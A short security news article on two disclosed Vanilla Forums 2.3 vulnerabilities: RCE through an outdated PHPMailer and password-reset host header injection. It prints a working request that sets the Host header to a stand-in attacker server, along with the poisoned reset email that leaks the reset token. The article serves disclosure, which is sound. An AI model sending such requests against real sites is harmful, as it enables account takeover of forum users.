Dawid Golunski of Legal Hackers has publicly disclosed two critical flaws in Vanilla Forums, the first vulnerability is a remote code execution (CVE-2016-10033) and the second vulnerability is a host header injection (CVE-2016-10073). The vulnerabilities affect the latest version (Vanilla 2.3).
Vanilla is forum software that powers discussions on hundreds of thousands of sites. Built for flexibility and integration, Vanilla is the best, most powerful community solution in the world.
Remote code execution (CVE-2016-10033):
The vulnerabilities exist because Vanilla software is still using a vulnerable version of PHPMailer (an open source PHP libraries used to send emails).
Golunski explained that the PHPMailer exploit makes the Vanilla Forums vulnerable, and it can be used with host header injection to allow attackers to inject arbitrary commands.
Host header injection (CVE-2016-10073):
An attacker may use HTTP HOST header to set the email domain to an arbitrary host. For example, sending the following HTTP request:
POST /vanilla2-3/entry/passwordrequest HTTP/1.1 Host: attackers_server Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: close Content-Length: 149 hpt=&Target=discussions&ClientHour=2017-05-10+22:00&Email=victim&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON
will result in the following email sent to the victim:
To: [email protected] Subject: [Vanilla 2.3] Reset Your Password X-PHP-Originating-Script: 0:class.phpmailer.php Date: Thu, 11 May 2017 09:42:13 +0000 Return-Path: noreply@attackers_server Message-ID: <a989e3868a609316dd9a7d7a991d79e5@attackers_server> X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net) MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset="utf-8" Vanilla 2.3 http://attackers_server/vanilla2-3/=0A=0A=0A=0AReset Your Passw= ord=0A=0A=0A=0AWe've received a request to change your password at Vanilla = 2.3. If you didn't make this request, please ignore this email.=0A=0A=0A=0A= Change My Password: http://attackers_server/vanilla2-3/entry/passwordreset/= 2/PdNvqaPnnFaG
The HOST header set to:
Host: attackers_server
The email will have the sender’s address set to noreply@attackers_server. The password reset link will also be modified and contain the attacker’s server which could allow the hacker to intercept the hash if the victim user clicked on the modified link.
The vulnerabilities are now patched as reported in the Vanilla forums.